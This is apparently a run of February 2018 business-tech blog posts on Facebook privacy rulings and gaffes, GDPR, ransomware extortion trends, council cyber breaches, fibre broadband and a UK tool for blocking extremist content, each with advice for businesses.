This story appears to show that despite an EU ruling, Google is still really in charge of making the decision about whether your personal details appear in its search engine results, based on its own research rather than your reasons in your request. For businesses wanting to hide certain information from public view, this is clearly an obstacle. Many businesses and individuals may have arguably suffered a much longer lasting punishment for any wrongs or from any bad publicity simply because they now operate in the age of the Internet, where things take a long time to be forgotten.

It will be interesting to see what difference GDPR makes to this situation because with GDPR, any EU citizen has the ‘right to be forgotten’ (all data held about them is to be removed), and GDPR can be enforced with the help of substantial fines for companies failing to comply with requests from individuals.

Google has long appeared to take the position that it sees some requests to remove certain URLs from its search engine results as a kind of censorship, and it remains to be seen just how much influence individuals will be able to exert over the big internet companies in the coming years.

Facebook Shooting Game Gaffe

 Facebook has faced criticism this week after news that it promoted a virtual reality shooting game set in a public train station, on its stand at a US conservatives' event.

Bad Timing

Clearly, in the light of the latest mass school shooting incident in Florida where a gunman killed 17 victims, it appeared to be a poor decision by Facebook to take the ‘Bullet Train’ game to the event.

The game, which Facebook says is a free title first unveiled in 2015, and was bundled with a number of other VR demos at the event, allows the player to shoot imaginary weapons against enemies in the setting of a public train station.


Adding to the weight of Facebook's  criticism for the game being aired is the fact that the event was a rightwing, CPAC conference where the National Rifle Association (NRA) has promoted gun rights. It has also been reported that CPAC featured speeches attacking gun control advocates, and a much criticised call from Donald Trump to give guns to school teachers.

It is darkly ironic that at a conference that had been dominated by discussions over gun control following a school shooting, delegates were then able to play a VR game which involved shooting people in a public place.

Exposed Via Twitter

News of the use of the game at the event was made public when a journalist at CPAC took to Twitter to post footage of the game being played.

Facebook has since expressed regret for promoting that particular game at the conference, and has announced that it has removed Bullet Train and any other action games that include violence from the VR demo.

Bad Few Weeks For Facebook In The Media

This latest gaffe is another in series of stories in the media that have generated some bad publicity for Facebook over the last couple of weeks.

For example, last week Facebook faced criticism for allegedly using registrations to 2 factor authentication as an opportunity to send out spam SMS notifications. Any requests to stop the texts were also reported to have been posted onto the user’s Facebook profile page. In the same week, a court in Belgium told Facebook to stop using tracking code to follow and record internet use by people who weren’t even Facebook users, until it complies with Belgium’s own privacy laws.

Facebook has also received some very bad publicity since it released figures showing that Russia-based operatives uploaded 80,000 posts to Facebook in the last 2 years, and thereby may have been able to have influenced the outcome of the last US election.

Not Allied To Any Political Party

Even though this latest shoot-em-up game gaffe took place at a right-wing event, Facebook has also been quick to stress that it routinely participates in events hosted by organizations across the political spectrum.

What Does This Mean For Your Business?

At the very least, this is an example of how it’s worth reviewing and checking every aspect of anything you’re presenting and promoting at a high profile event, coupled with a final reality-check is always worthwhile if you want to avoid any unnecessary bad publicity.

This story is also a reminder that we live in an age where we are constantly connected to a worldwide news network where social media can be used to instantly broadcast any errors that companies, organisations and governments make.

This story also reminds us that the activities of powerful internet companies are now under scrutiny by campaign and other interest groups, and in today’s environment, the stories of individuals rather than governments about their experiences with big internet companies can become quite powerful in keeping those companies in check and holding them to account once those stories gain momentum and mass on social media.

Monday, February 26, 2018

Belgium Says No To Facebook Tracking Code

A court in Belgium has told Facebook to stop using tracking code to follow and record internet use by people surfing in Belgium, until it complies with the country’s own privacy laws.

What’s The Problem?

According to Belgium’s privacy watchdog, the Belgian Commission for the Protection of Privacy (CPP), Facebook placed tracking code in the form of ‘cookies’ on third-party websites. This would mean that Facebook’s actions did not comply with Belgium’s privacy laws because:
  • It tracked people without consent.
  • It tracked people who were not Facebook users.
  • It (presumably) stored the tracked personal data that it obtained illegally in the first place.

What Now?

If Facebook fails to comply with Belgium’s CPP it could face fines of £221,000 per day.

Industry Standard

Facebook is reported to have expressed disappointment at the verdict and has stated that it is simply using the same industry standard cookies and pixels that other EU businesses use to help them grow their business.


This latest case appears to be the latest round in a long-running, ongoing dispute between the social media giant and the CPP. For example, back in November 2015, the CPP won a case against Facebook concerning the tracking of people with a ‘datr cookie’ when they visited pages on the site and clicked on like or share, even if they had never registered for an account, or if they had but weren’t even logged in.

Facebook was able to appeal and win an overturning of the verdict because it was judged that Belgian courts didn’t have international jurisdiction over Facebook Ireland i.e. because the data collected by the cookies was stored on servers in Dublin, the European base of Facebook’s operations.

The CPP then indicated that it would try to appeal against Facebook’s successful appeal through Belgium’s court of cassation, using a Yahoo case as an example. With Yahoo, for example, it was ruled back in 2015 that finding against Yahoo wouldn’t have to mean intervention outside of Belgium, and that, since Yahoo actively participated in the economic life of Belgium by using the domain name .be or displaying ads based on users’ location e.g. in Belgium, it voluntarily submitted itself to Belgian law.

What Does This Mean For Your Business?

This story has commercial, legal and political aspects to it. Cookies can provide useful information and functions for businesses e.g. helping to personalise user browsing experiences, and gathering information about users of the company website - usually with an initial registration of consent by users of a website.

With this Facebook case, as web users, we may feel uneasy that trusted companies may be tracking all-comers without consent. This kind of story reminds us all about the importance of privacy and security, and its worth remembering that cookies sent over the web without encryption i.e. if the website doesn’t have HTTPS in front of the domain, could be a security risk because they are readable by anyone on a network and could sensitive data e.g. credit card details, e-mail address and more. Google, for example, has just announced that from July, Chrome will be labelling websites without HTTPS as ‘Not Secure’ to try and combat this kind of risk.

The legal aspect of this case relates to which country has jurisdiction over the actions of a company whose services are used in that country, but the HQ and the data storage are in another country. This is another long-running legal argument e.g. Apple’s tax breaks in Ireland.

Many see the EU and people like the EU’s commissioner for competition, and measures like greater regulation and taxation as being useful to curb some of the more suspect behaviour of the big US Internet companies in Europe.

The introduction of GDPR should also provide greater protection for EU citizens in terms of online privacy and security. The UK will soon not be an EU member, but will have its own similar Bill added to UK law, but this could produce more legal grey areas.

There is clearly a political dimension to this story too as Belgium seeks to hold a powerful overseas company to account, and it wouldn’t be the first time that an EU country has tried to do this.

Facebook In Authentication Spamming Row

Facebook is facing criticism for allegedly using sign-ups to 2 factor

authentication as an opportunity to send spam SMS notifications.

What 2FA?

Facebook has been allowing users to sign up for SMS-based two-factor authentication to mitigate the risk of phishing attempts and to help protect people from having their accounts compromised.

Spam Too

Unfortunately, in addition to receiving the authentication texts / security tokens that they expected, some sign-ups have also reported receiving what are essentially extra spam texts from Facebook with links to other things happening on the social network.

To make matters even worse, any replies to the spam texts e.g. requests to stop the texts, were reported to have been posted onto the user’s Facebook profile page.

Facebook Sorry

After complaints were received, Facebook released a statement saying that it was sorry for any inconvenience caused, and that it was not their intention to send non-security-related SMS notifications to the phone numbers that customers had submitted as part of the two-factor authentication service.

With regards to posting customer replies to the spam texts on their own Facebook profiles, Facebook explained that this was a throwback to a time before the ubiquity of smartphones when Facebook supported posting to profiles via text message. Facebook admitted, however, that this feature is now less useful, and that it would soon be deprecated.

Bad Publicity In Europe

This incident comes on top of plenty of recent bad publicity in Europe for Facebook. Firstly, after a dispute dating back to 2015 where Facebook fell foul of Verbraucherzentrale Bundesverband (vzbv), or Federation of German Consumer Organisations, a German court has just ruled that Facebook didn’t do enough to alert people to the pre-ticked privacy settings on its mobile app. It also found that eight clauses in Facebook's terms of service were invalid, including terms that allow Facebook to transmit data to the US and use personal data for commercial purposes.

In a separate long-running spat, this time in Belgium, Facebook lost in a court case with Belgium’s privacy watchdog, the Belgian commission for the protection of privacy (CPP), where it was ruled that Facebook failed to comply with Belgian privacy laws. This time, it was found that Facebook had been using cookies to track people who may or may not have been Facebook users without their consent, and then stored the tracked personal data that it obtained illegally in the first place.

What Does This Mean For Your Business?

As well as highlighting how it appears that the behaviour of some big US Internet companies in Europe are being closely monitored (and needs to be), it highlights how data privacy laws and courts differ in different countries.

This story also brings into focus the importance of the imminent introduction of GDPR in May this year, which should go some way to making data privacy and security laws more uniform and consistent across the EU region. Even though the UK won’t be in the EU soon, GDPR will apply initially, and then the Data Protection Bill (DPB) will replace the Data Protection Act 1998, and will essentially transfer the EU’s GDPR into UK law for the future.

On the subject of GDPR, businesses should be reminded that we have now passed what is known as ‘X-Day’ (100 days from GDPR’s introduction), and that businesses and organisations need to quickly adopt an automated, classification-based, policy-driven approach so that they can meet the regulatory demands within the short time frame available.

In relation to the Facebook case of ‘accidental’ spam after sign-ups for the SMS-based two-factor authentication service, this behaviour would contravene GDPR because, under GDPR, the users would have only given consent for the 2FA service, and not for anything else. GDPR may, therefore, make companies think very seriously about what SMS and email messages they send to user groups based on their initial consent. The whole area of consent and GDPR is something that will need more discussion and clarification to help businesses understand the new boundaries for their online marketing.

GDPR Extortion Prediction

A report by Security Company Trend Micro has predicted that, as cyber criminals are now focusing more on maximising financial return, the introduction of GDPR this year could give them potentially lucrative extortion opportunities.


The point that this report is making is that, with the prospect of massive fines under GDPR e.g. fines up to €20 million, or 4% of their global turnover, criminals could extort large sums of money from companies with the threat of a cyber attack that could lead to data security breach, which could in turn lead to a fine under GDPR. It has been suggested that criminals could first determine the penalty under GDPR that could result from an attack, and then demand a ransom of slightly less than that fine.

What’s Happening?

The recent trends in cyber crime are what have led to this latest chilling prediction. For example, the fact that cyber criminals appear to be abandoning exploit kits and indiscriminate attacks in favour of more strategic attacks with maximised financial gain is a trend that has become more apparent. This trend coupled with the fact that, although the number of reported breaches in 2017 was lower than in 2016, the amount of data compromised by cyber attacks increased, have led security commentators to believe that criminals will seek to exploit GDPR as a money-making weapon.

Predictions Started Last Year

Predictions that the threat of GDPR fines could be exploited by criminals first surfaced in the media last November when researcher Mikko Hypponen made the point that GDPR fine figures could give cyber-criminals who are using ransomware, or hackers stealing data, a price point to set the ransom at because now they know how much money they should be asking.

Hypponen argued that because the criminals know what data is worth / what covering-up a data breach may be worth to some companies (probably large, well-known ones), these companies may be actually willing to pay anything less than the full amount of the fine to avoid serious damage to their reputation, loss of customers and more.

According to Hypponen, ransoms could, therefore, be set at up to 2% or 3% of the targeted organisation’s global annual turnover. This could equate to millions of dollars in some cases.

Threat Of Reporting Too

As well as the threat of a ransom to avoid a direct, deliberate attack that would result in a fine, security commentators have also suggested that hackers / scammers could steal data with advanced ransomware and then blackmail the victims with the threat of reporting them to the data protection commissioner. This is because ransomware can affect the availability, access, and recovery of personal data.

Other Trends

Other Trends uncovered in the recent Trend Micro Report include:
  • A 32% increase in new ransomware families from 2016 to 2017.
  • A doubling of business email compromise (BEC) attempts between the first and second half of 2017.
  • Rapidly rising rates of cryptocurrency mining malware (100,000 detections in October).
  • A 22% increase from 2016 in BEC attempts to trick company employees into approving money transfers to criminal accounts, mostly targeting the chief financial officer (CFO).
  • More attacks on vulnerable internet of things (IoT) devices, with software vulnerabilities also continued to be targeted (1,009 new flaws discovered and disclosed in 2017).

What Does This Mean For Your Business?

As well as being an opportunity to get the (data) house in order and to enhance competitiveness (GDPR compliant companies are more likely to want to deal with other compliant companies), the size of the fines and now the potential activities of extortionists are risks for the coming years for UK businesses. Even though these predictions relate to more daring and sophisticated crimes, companies should still make sure that they are at least covered against more basic attempts e.g. by keeping up to date with software patching, and covering all known vulnerabilities.

Ways that companies could protect themselves against hacking / ransomware threats include only giving users access to what they need and taking away admin privileges, backing up all critical files effectively and securely, and testing those backups to make sure that information can be restored in a usable form. Training of staff e.g. chief financial officers (CFOs) or anyone involved in payment, and establishing a clear process for checking and chain of command could reduce the risk of BEC attempts and socially engineered attacks. Businesses would also be wise to make sure that their Business Continuity and Disaster Recovery Plans are kept up to date in the light of emerging threats.

More security commentators are also now warning businesses against the potentially devastating combination of security oversights, increasingly aggressive threats and, perhaps, carelessness in some aspects of cyber and data security.

Facebook Postcards To Combat Election Interference

Following disclosures of how Facebook was used by advertisers who may
have been seeking to influence the US election result, Facebook has suggested that in future in the US, those backing candidates with advertising campaigns will receive a ‘snail mail’ postcard sent by Facebook with a verification code.

Ads Mentioning A Candidate

The measure is reported to be only applicable to those who run adverts mentioning a specific candidate, rather than paying to promote a political message e.g. a policy. The verification code sent on the post card can then be used to confirm the advertiser lives in the United States.

Won’t Solve Everything

Facebook’s global director of policy programs, Katie Harbath, has reportedly acknowledged that the postcard idea may not solve all the all problems, but it is the most effective solution that the company could come up with for the time bring to stop similar illegal activity happening on its platform.

How Bad Was It?

Back in November, Facebook released figures ahead of its Senate hearing showing that Russia-based operatives uploaded 80,000 posts to Facebook in the last 2 years. Taking into account posts published between June 2015 and August 2017, it is believed that 29 million Americans saw the posts directly, and that 26 million American users may have seen, and perhaps been influenced by, liked and shared messages and comments that could have originated in Russia.

Also, US Special Counsel Robert Mueller said recently that no fewer than 13 Russians and three Russian companies are believed to have committed criminal offences by using social media to interfere in the US election.

What Does This Mean For Your Business?

It does seem a little ironic that one of the world’s most famous Internet companies must resort to ‘snail mail’ to solve a major problem, but as the company says, it seems like the only effective option for now. It would also be easy to see how this overt, but fairly limited option could be gotten around by e.g. determined state sponsored players.

The bigger picture of the whole election result influence story (i.e. which party / candidate wins) is that it has a big effect on the business environment as well as on society. It is not a surprise that one country could seek to influence events in another, but it is a surprise to some people that tech companies and social media companies are still able to offer such a powerful voice and a channel to all.

The challenge that tech companies such as Facebook and Google (with YouTube) face is that they need to protect the idea that they reject censorship and interference from governments, while still being seen to be acting responsibly and proactively, while also protecting their brands and monetising elements of their business at the same time.

The election revelations have just served to add fuel to the arguments of governments and politicians, both in the US and the UK, that they don’t have more of an influence over social media and tech companies e.g. with the end-to-end encryption debate in the UK, and that they often only come up against lawyers for these companies rather being able to be seen to be publicly grilling the owners of these tech giants themselves.

A Quarter Of Councils Have Been Hacked

A freedom of information request by privacy campaign group Big Brother
Watch has revealed the shocking statistic that a quarter of all UK councils have had their IT systems breached in the past five years.

37 Attempted Cyber Attacks Every Minute

The ‘Cyber Attacks In Local Authorities’ report from Big Brother Watch shows that local governments are subject to cyber attack attempts at the staggering rate of 37 per minute!

Thankfully, only a tiny fraction of the attacks launched are successful although this still represents a serious problem. For example, 114 councils experienced at least one incident between 2013 and 2017.

High Stakes

The nature of the work of UK Councils is such that they hold a large amount of up-to-date personal data for people in their areas, so one successful breach can have very serious consequences.

Not Disclosing Breaches

One particularly worrying aspect of council behaviour exposed by the report is that, from the data gathered, few seem to have reported losses and breaches of data, which is something that organisations will be required to do within 72 hours under GDPR when it comes into force in May.

Human Error - Training Needed

As in so many companies and organisations, human error is often a factor in breaches. In 2015, for example, Big Brother Watch has exposed how local authorities committed 4 data breaches a day, all thought to be predominantly caused by human error.

Big Brother Watch has also revealed that that, despite the number and seriousness of the breaches, little action has been taken by UK councils to increase staff awareness and education in matters of cyber security and data protection. For example, it has been disclosed that 75% of local authorities do not provide mandatory training in cyber security awareness for staff, and that16% do not provide any training at all!

What Does This Mean For Your Business?

Some commentators have been quick to point out that bearing in mind how much sensitive data councils hold about citizens, and the incredible amount of attempted cyber attacks against them, they could be making more of an effort and an investment to beef-up security.

Other commentators have noted that cuts to council budgets e.g. with austerity measures may have played their part in limiting cyber security effectiveness in UK councils.

After the shocking findings of the report, Big Brother Watch issued some recommendations to local authorities which could very well apply to other businesses and organisations. These are:
  • Cyber security should be prioritised, and that rather than investing too much in surveillance technologies, more should be invested in cyber security strategies and in the training of staff.
  • Cyber security incidents should be consistently reported, and that a protocol needs to be established so that incidents are reported quickly and to the right authorities e.g. the police, the ICO, and the National Cyber Security Centre.
  • All staff should receive mandatory training in cyber security because Cyber attacks are not only designed to breach computer systems, but also to exploit humans who are often the weakest cyber security link.

Monday, February 19, 2018

10 Gbps Home Broadband Speed Achieved In Test

Broadband operator Hyperoptic is reported to have achieved home
Broadband speeds of up to 10 gigabits per second (Gbps) in a recent test.


‘Hyperoptic’ is the company name in this case, but the term hyperoptic generally refers to the kinds of super speeds that can be achieved with full fibre / fibre-to-the-building / fibre-to-the-home / 'fibre-to-the-premises' infrastructure and packages.

A First

The result of the test, which was carried out in a home in the former Olympic village in east London (presumably because it is fully fibre linked), is thought to be the first time that such speeds have been brought to a UK home using an existing ISP network rather than a dedicated line.

How Fast Is That?

Quoted broadband speed figures are often not what they seem, but speeds of up 10 gigabits per second would mean that:
  • A standard HD movie file (5GB) could be downloaded in 4 seconds, compared with 6 minutes 40 seconds on a 100Mbps connection.
  • A 25GB Xbox game could be downloaded in 20 seconds, compared with more than 33 minutes on a 100Mbps connection.
  • The latest full 4K ultra high definition movie (75 GB) could be downloaded in just 1 minute, compared to 1 hour 40 minutes on a 100Mbps connection.

Why Do We Need Hyper Speeds?

Spending more time on more powerful gadgets / mobile devices, the growth of the subscription economy for services, the continued growth of online shopping, the growth of the cloud, the popularity of gaming, video and social media programs, the popularity of TV / Film and other media streaming services, the demand to download bigger and better quality files, and the frustration of buffering and slow connections over many years have all stimulated UK demand for better and faster connections. Also, more businesses are looking to future-proof their networks, and they feel that much faster connections are needed for effective global business competitiveness.

As things stand, a recent survey by found that the UK ranks only 31st in the world for average broadband speeds, with an average broadband speed of just 16.51Mbps.

Trials of Full Broadband In 6 UK Regions

Back in September, the UK government announced that six regions of the UK would be hosting trials of full fibre broadband for businesses, schools and hospitals as part of a £200m scheme by the Department for Digital, Culture, Media & Sport (DCMS).

According to the DCMS, £10 million of the total £200 million budget will be spent on trials for full fibre broadband in Aberdeen and Aberdeenshire, West Sussex, Coventry and Warwickshire, Bristol and Bath & North East Somerset, West Yorkshire and Greater Manchester.

Commitment From Big Providers

The big UK broadband providers are making more of a commitment to the kind of full-fibre connections that could bring much faster speeds. For example, BT has promised to bring full-fibre connections to 3 million premises by 2020, 700,000 of which will be in rural areas. Also, TalkTalk has announced a big investment in infrastructure which will bring full-fibre technology to 3 million homes and businesses.


Despite this recent announcement by Hyperoptic, there are many valid criticisms about any big plans for boosting broadband speeds with the widespread use of fibre-optic cables in the UK including:

  1. Even if you have a fibre-optic cable to your home / business premises, there will still be shared traffic points in the network which will slow down your broadband at certain times.
  2. Full fibre-optic, ultra-fast broadband is not likely to be a reality in the UK anytime soon. At the current rate, BT Openreach has stated that only two million premises will have access to ‘full fibre’ by the end of 2020.

What Does This Mean For Your Business?

The test by Hyperoptic is really just a tantalizing view of what could be possible if we all had full-fibre broadband up to our premises, and a fabulous UK fibre infrastructure. Obviously, that could bring considerable value-adding, cost-saving, competitiveness-boosting benefits to UK businesses.

Sadly, the current reality is that businesses don’t have (and look unlikely to have any time soon) access to kind of speeds that overseas companies (e.g. competitors) enjoy, and certainly don’t have access to the speeds that the Hyperoptic test was demonstrating.

Whilst it is good that funding and momentum for the task of delivering faster (fibre or fibre/ broadband for UK businesses looks to be increasing, the UK has a long way to go, and the reality is that we may only actually have 7% full fibre coverage by 2020.

In terms of what it actually means for a business to be physically connected to a fibre broadband infrastructure, technical commentators say it will be a case of simply having a small box installed on the premises. In terms of costs, it seems likely that faster full-fibre packages will be an opportunity for ISPs to charge more.

UK Government Unveils Online Extremism Blocker

Home Secretary Amber Rudd has unveiled the UK government’s new tool for detecting and blocking online extremist and jihadist content.

Publicly Funded

The new tool was developed by artificial intelligence company ‘ASI Data Science’ based in London, and was funded using £600,000 of public funds.

Tackling A Growing Problem

The tool was developed to tackle the growing problem extremist / jihadist (e.g. IS) content being posted online, and current moderating techniques simply not being able to keep up with the job of detecting and removing it fast enough. For example, as well as the popular video platforms for posting such content, the Home Office estimates that between July and the end of 2017, extremist material appeared in almost 150 web services that had not been used for this kind of propaganda before.

An ASI Data Science spokesperson is reported as saying that there are currently over 100 different (extremist / IS) videos posted on over 400 different platforms online.

The danger is of course, that the material can contribute to the promotion of extremist causes, the radicalisation of people, the recruitment of new terror group members, and inspiring individuals / groups to commit their own acts of terror. Some of the content can also be very disturbing e.g. if viewed by children online.

How The New Tool Works

The new tool is reported to have an AI element which has enabled it to be ‘trained’ to correctly pick out extremist content. For obvious reasons, the exact workings of the tool are being kept secret, but it is understood that the tool uses an algorithm to detect signals that contribute to a level of probability (low to high) that a video is likely to be terrorist propaganda rather than e.g. a legitimate news video. The tool can be applied at the point of upload on a video platform, thereby stopping the propaganda video from being uploaded in the first place.

This tool is reported to be able to accurately detect 94% of IS video uploads, and that it can typically flag 0.005% of non-IS video uploads. On a site with five million daily uploads, for example, it would flag 250 non-IS videos for review / for a human decision to be taken.

Others Have Tried

Facebook and Google are known to have been trying to develop their own terror material filtering tool, and this UK version is thought to be suitable for use by smaller platforms first.

Home Secretary Says.

Home Secretary Rudd is reported as saying that even though the tool has been developed, the UK government won’t rule out taking legislative action too where necessary, and that an industry-led forum such as The Global Internet Forum to Counter Terrorism, launched last year, will also help to tackle the issue.

What Does This Mean For Your Business?

For businesses using the smaller social media and video platforms, this tool could be a practical solution to current moderation problems. For the UK government, it provides some good publicity, a chance to gain back some ground in the online battle with terror groups such as IS, and a way to be seen to be tackling worries of radicalisation of UK citizens. It also provides a way for the Home Secretary to apply more pressure to the popular social media platforms, some of which the UK government has criticised for not taking enough fast action to detect remove extremist content.

For UK businesses generally, association with and use of advertising platforms that are free of extremist and unsavoury material is obviously better from a brand protection point of view. It is, however, a fact that Facebook and Google are hugely important for business advertising, and that PPC advertising for example, is unlikely to be affected by whether the chosen video / social media platform adopts such a screening-tool in the near future.